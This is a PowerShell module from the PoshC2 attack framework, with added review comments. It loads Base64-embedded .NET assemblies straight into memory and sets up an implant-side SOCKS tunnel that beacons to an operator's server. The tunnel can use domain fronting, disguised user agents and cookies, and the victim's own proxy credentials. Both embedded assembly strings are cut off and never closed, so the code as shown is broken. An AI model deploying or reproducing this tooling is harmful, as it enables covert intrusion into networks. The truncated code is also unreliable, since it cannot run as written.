PoshC2_Python/Modules/SharpSocks.ps1

# Session state shared by SharpSocks and StopSocks.
# Load-once flags: SharpSocks compares these against the string "TRUE" before
# loading an embedded assembly.
# NOTE(review): they are initialised here in the Global scope but SharpSocks
# writes them through $Script: - whether both names resolve to the same
# variable depends on how this file is loaded; confirm.
$Global:SocksServerLoaded = $false
$Global:SocksClientLoaded = $false
# Result of the last start/stop call; StopSocks uses it as the "running" flag.
$Global:BoolStart = $null
# Client-side controller object; assigned by SharpSocks -Client.
$Global:Socks = $null
# Helper objects handed to the server and client controllers respectively.
$Comms = $null
$iLogOutput = $null
function SharpSocks {
<#
.Synopsis
Socks Proxy written in C# for .NET v4
Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
SharpSocks 2017 Nettitude
Rob Maslen @rbmaslen
.DESCRIPTION
PS C:\> Usage: SharpSocks -Uri <Host>
.EXAMPLE
Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections
PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
.EXAMPLE
Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections. Use the provided certificates for the web server that listens for connections from the implant
PS C:\> SharpSocks -Server -TLSServerCertificate $<X509Certificate2> -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
.EXAMPLE
Start the server specifying the Encryption key and Command Channel Id to be used (these SAME values MUST also be passed to the client)
PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080 -Insecure -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6
.EXAMPLE
Start the Implant(Client) specifying the web server (http://127.0.0.1:8081), the encryption keys and channel id. Also specify a list of URLs to use when making HTTP Request. Set the beacon time to 5 seconds
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "site/review/access.php","upload/data/images" -Beacon 5000
.EXAMPLE
Same as above using different list of URLs
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 5000
.EXAMPLE
Same as above but connect out via an authenticated proxy server (-ProxyPass is accepted as an unambiguous prefix of -ProxyPassword)
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -ProxyUser bob -ProxyPass pass -ProxyDomain dom -ProxyUrl http://10.150.10.1:8080 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 500
#>
# Review notes on the parameters below:
#  - -Key and -ProxyPassword are plain [string] values, so they are recorded
#    wherever the command line is (history, transcripts, script block logs).
#  - -URLs is untyped; a single string is iterated as a one-element list.
#  - -Beacon defaults to the string "2000", coerced to [int]; the help examples
#    treat the value as milliseconds (5000 = 5 seconds).
#  - -IPAddress defaults to 0.0.0.0 and is passed to the server controller;
#    presumably the listen address, i.e. all interfaces - confirm against the
#    assembly.
#  - -Server and -Client are independent switches; nothing here rejects both
#    or neither being supplied.
param(
[Parameter(Mandatory=$True)][string]$Uri,
[Parameter(Mandatory=$False)]$URLs="Upload",
[Parameter(Mandatory=$False)][switch]$Server,
[Parameter(Mandatory=$False)][switch]$Client,
[Parameter(Mandatory=$False)][int]$SocksPort=43334,
[Parameter(Mandatory=$False)][string]$Channel,
[Parameter(Mandatory=$False)][string]$IPAddress="0.0.0.0",
[Parameter(Mandatory=$False)][string]$DomainFrontURL,
[Parameter(Mandatory=$False)][int]$Beacon="2000",
[Parameter(Mandatory=$False)][string]$Key,
[Parameter(Mandatory=$False)][switch]$Insecure,
[Parameter(Mandatory=$False)][string]$UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36",
[Parameter(Mandatory=$False)][string]$Cookie1="ASP.NET_SessionId",
[Parameter(Mandatory=$False)][string]$Cookie2="__RequestVerificationToken",
[Parameter(Mandatory=$False, HelpMessage="Certificate to be used by the web server, must be of type System.Security.Cryptography.X509Certificates.X509Certificate2")][System.Security.Cryptography.X509Certificates.X509Certificate2]$TLSServerCertificate,
[Parameter(Mandatory=$False)][string]$ProxyURL,
[Parameter(Mandatory=$False)][string]$ProxyDomain,
[Parameter(Mandatory=$False)][string]$ProxyUser,
[Parameter(Mandatory=$False)][string]$ProxyPassword
)
echo "[-] Loading Assemblies"
# CLR major versions are 2 and 4, so "-lt 3" selects the CLR 2 runtime; the
# embedded assemblies are described above as built for .NET v4. In that case
# only the message is printed and nothing below runs.
if ($psversiontable.CLRVersion.Major -lt 3) {
echo "Not running on CLRVersion 4 or above. Try 'migrate' to use unmanaged powershell"
} else {
# Load-once guard for the client assembly. The flag is set to "TRUE" before
# the load is attempted, so a failed load is not retried on the next call.
if (($SocksClientLoaded -ne "TRUE") -and ($Client.IsPresent)) {
$Script:SocksClientLoaded = "TRUE"
echo "[-] Loading Client Assembly"
$PS = "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
# Decode the Base64 literal held in $PS into raw bytes. The literal begins with
# "TVqQ", the Base64 form of the "MZ" PE header, i.e. a compiled assembly
# carried inside the script text.
$DllBytes = [System.Convert]::FromBase64String($PS)
# Assembly.Load(byte[]) loads the assembly into the current PowerShell process
# straight from memory; this call writes no file. For defenders the useful
# records are therefore the script text itself (script block logging, event
# ID 4104, and AMSI both see the literal) and .NET assembly-load telemetry.
# $Assembly is not referenced again in the visible code.
$Assembly = [System.Reflection.Assembly]::Load($DllBytes)
echo "[+] Client Assembly Loaded"
}
# Same load-once guard for the server assembly when -Server is supplied; the
# flag is again set before the load is attempted.
if (($SocksServerLoaded -ne "TRUE") -and ($Server.IsPresent)) {
$Script:SocksServerLoaded = "TRUE"
echo "[-] Loading Server Assembly"
$PS = "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
# Decode the Base64 literal in $PS and load the resulting assembly into the
# current process from memory (Assembly.Load(byte[]) writes no file).
$DllBytes = [System.Convert]::FromBase64String($PS)
$Assembly = [System.Reflection.Assembly]::Load($DllBytes)
echo "[+] Server Server Loaded"
}
# Translate the -Insecure switch into a boolean. It is only passed to the
# client controller below; the server call does not receive it.
# NOTE(review): presumably disables TLS certificate validation - confirm
# against the assembly.
if($Insecure.IsPresent) {
$InsecureSSL=$true
} else {
$InsecureSSL=$false
}
# Generate a fresh Base64 key when none was supplied. Both ends must use the
# same key, so a generated key has to be copied to the other side.
if (!$Key) {
$Key = Create-AesKey
}
# The key already exists as a plain string in $Key (and is echoed further
# down), so wrapping it in a SecureString here only satisfies the client
# controller's parameter type; it does not protect the value.
$secureStringPwd = $Key | ConvertTo-SecureString -AsPlainText -Force
# Generate a 25-character channel id when none was supplied.
if (!$Channel) {
$Channel = Get-RandomChamnnel -Length 25
}
# Proxy configuration for outbound requests.
if ($ProxyURL) {
# Second constructor argument is BypassOnLocal.
$Proxy = New-Object System.Net.WebProxy($ProxyURL,$True);
if ($ProxyUser -and $ProxyPassword) {
# Explicit proxy credentials; $ProxyDomain may be empty.
$creds = new-object System.Net.NetworkCredential
$creds.UserName = $ProxyUser
$creds.Domain = $ProxyDomain
$creds.SecurePassword = ConvertTo-SecureString $ProxyPassword -AsPlainText -Force;
$Proxy.Credentials = $Creds;
} else {
# No explicit credentials: authenticate to the proxy as the current user.
$Proxy.UseDefaultCredentials = $True;
}
} else {
# No proxy given: use the system proxy with the current user's credentials,
# so proxy logs attribute the traffic to the logged-on account.
$Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
}
# Parse the URI; a malformed value fails here.
# NOTE(review): $Uri is declared [string] in the param block, so the result is
# presumably converted back to a string on assignment - confirm.
$Uri = [System.Uri]$Uri
# Copy -URLs into a List[String], the type handed to the client controller.
$NewURLs = New-Object "System.Collections.Generic.List[String]"
foreach ($URL in $URLs) {
$NewURLs.Add($URL)
}
if ($Server.IsPresent){
# Server mode: the controller is created through a static method and only its
# return value is kept in $BoolStart; $Socks is not assigned on this path.
$Script:iLogOutput = New-Object SharpSocksServer.ServerComms.DebugConsoleOutput
$Script:BoolStart = [SharpSocksServer.Source.Integration.PSSocksServer]::CreateSocksController($IPAddress, $uri, $TLSServerCertificate, $Channel, $SocksPort, $key, $Cookie1, $Cookie2, $iLogOutput);
if ($BoolStart) {
echo ""
echo "[+] SharpSocks server started!"
echo ""
echo "-Channel $Channel"
# The symmetric key is written to the output stream in clear text, so it ends
# up in any transcript or log that captures this output.
echo "-Key $Key"
echo "Cookies: $Cookie1 $Cookie2"
echo ""
echo ""
echo "[-] Run StopSocks to stop the server!"
echo ""
}
}
if ($Client.IsPresent){
# Client mode: build the controller, keep it in $Socks and start it.
$Script:Comms = New-Object SocksProxy.Classes.Integration.PoshDefaultImplantComms
$Script:Socks = [SocksProxy.Classes.Integration.PoshCreateProxy]::CreateSocksController($Uri, $Channel, $DomainFrontURL, $UserAgent, $secureStringPwd, $NewURLs, $Cookie1, $Cookie2, $Proxy, $Beacon, $Comms, $InsecureSSL);
$Script:BoolStart = $Socks.Start()
if ($BoolStart) {
echo ""
echo "[+] SharpSocks client Started!"
echo ""
echo "URLs:"
# Printed as $Uri immediately followed by each entry of -URLs.
foreach ($URL in $URLs) {
echo "$($Uri)$($URL)"
}
echo "Channel: $Channel"
# Clear-text key in the output stream, as in server mode.
echo "Key being used: $Key"
echo "Beacon: $Beacon"
echo "Cookies: $Cookie1 $Cookie2"
echo "User-Agent: $UserAgent"
echo ""
echo ""
echo "[-] Run StopSocks to stop the client!"
echo ""
}
}
# Closes the CLR-version else branch, then the function.
}
}
function StopSocks {
    # Stops a running SharpSocks instance by calling Stop() and then HARDStop()
    # on $Socks, storing each return value in $Script:BoolStart. When $BoolStart
    # is not truthy, only reports that nothing is running.
    # NOTE(review): SharpSocks assigns $Socks only on its -Client path; in
    # server mode $BoolStart is set but $Socks appears to stay $null, so the
    # calls below would fail there - confirm.
    if (-not $BoolStart) {
        echo ""
        echo "[-] SharpSocks not running!"
        echo ""
        return
    }

    $Script:BoolStart = $Socks.Stop()
    $Script:BoolStart = $Socks.HARDStop()
    echo ""
    echo "[-] SharpSocks stopped!"
    echo ""
}
# Builds a RijndaelManaged instance configured as AES-256 (128-bit block,
# 256-bit key) in CBC mode with zero padding, optionally seeded with a key
# and/or IV. Each of $key and $IV may be a Base64 string or a value assignable
# to the property directly (e.g. a byte array); falsy values are skipped.
# NOTE(review): CBC carries no integrity check, and PaddingMode.Zeros cannot
# tell trailing zero bytes of plaintext from padding. In this file the object
# is only used by Create-AesKey to generate a key, so mode and padding are not
# exercised here.
function Create-AesManagedObject
{
    param
    (
        [Object]
        $key,
        [Object]
        $IV
    )

    $cipher = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
    $cipher.KeySize = 256
    $cipher.BlockSize = 128
    $cipher.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $cipher.Mode = [System.Security.Cryptography.CipherMode]::CBC

    if ($IV)
    {
        # Strings are treated as Base64; anything else is assigned as-is.
        if ($IV.getType().Name -ne 'String')
        {
            $cipher.IV = $IV
        }
        else
        {
            $cipher.IV = [System.Convert]::FromBase64String($IV)
        }
    }

    if ($key)
    {
        if ($key.getType().Name -ne 'String')
        {
            $cipher.Key = $key
        }
        else
        {
            $cipher.Key = [System.Convert]::FromBase64String($key)
        }
    }

    return $cipher
}
# Creates a random AES symmetric encryption key and returns it Base64-encoded.
# Create-AesManagedObject sets KeySize to 256, so the key is 32 bytes.
function Create-AesKey()
{
    $keySource = Create-AesManagedObject
    # Force a fresh random key on the cipher object, then read it back.
    $keySource.GenerateKey()
    $encodedKey = [System.Convert]::ToBase64String($keySource.Key)
    return $encodedKey
}
function Get-RandomChamnnel
{
    # Returns a string of $Length characters, each drawn independently from
    # the lowercase letters a-z and the digits 0-9. A $Length of zero or less
    # yields an empty string.
    # NOTE(review): Get-Random is not guaranteed to be cryptographically strong
    # on every PowerShell version, so the result is an identifier rather than
    # a secret.
    param ([int]$Length)

    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
    $builder = New-Object System.Text.StringBuilder
    $remaining = $Length
    while ($remaining -gt 0)
    {
        [void]$builder.Append(($alphabet | Get-Random))
        $remaining--
    }
    return $builder.ToString()
}